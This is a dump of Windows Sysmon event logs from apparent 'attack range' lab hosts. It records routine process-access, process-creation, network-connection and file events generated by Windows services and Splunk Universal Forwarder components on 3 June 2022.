14:17:47.829{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044135Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044134Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044133Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044132Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044131Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044130Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-180B-629A-1407-000000006002}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044129Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-180B-629A-1407-000000006002}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044128Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.829{0A5DF930-180B-629A-1407-000000006002}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000044127Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:45.811{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52340-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044126Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:47.313{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEF3C08F6C504CC37B1C95C30A95E1EA,SHA256=D59F503CEEF28BB7B102B7612B2A94527490500DF2DDAF2D82E9E5109C1A8E71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:47.233{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=14F7841334ADA2FCBA4889D1B4276763,SHA256=4A6CFF4697CB43A906E164E8EB5C3E84B6CCA0D5A540C009D410EE131461D6B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:48.471{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80E4073DA9040FEFAC10C096A58BAD4B,SHA256=9F32908B8B7EE39E839DA7769045FA42CB28DAB7A4F634154C2C792B6D850088,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044156Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.938{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31D997FB51228BD76C6351DCB80C0513,SHA256=F8B682986ECEA290959E3741604871C3A6EB6EAE3503305B08CD3D936EF58FDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044155Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.641{0A5DF930-180C-629A-1507-000000006002}3728228C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044154Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-180C-629A-1507-000000006002}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044153Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044152Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044151Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044150Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044149Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044148Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044147Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044146Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044145Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044144Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-180C-629A-1507-000000006002}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044143Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.500{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-180C-629A-1507-000000006002}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044142Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.501{0A5DF930-180C-629A-1507-000000006002}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044141Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:48.407{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24EFB9499284E6B64447E1AAB1B439BD,SHA256=737BBEE714D3684DE90D5545735C7C0B46613A35EBE98A4512BE84B79A9D1EA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044170Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.657{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D8CCA3655B4217F23BB7DC720538B1F,SHA256=5553F8C0E9924ABD6964548B28973EE392F8A621921833D5D3E513C9AABF536A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:49.587{2E1864BB-E1CC-6299-F500-000000005F02}792NT 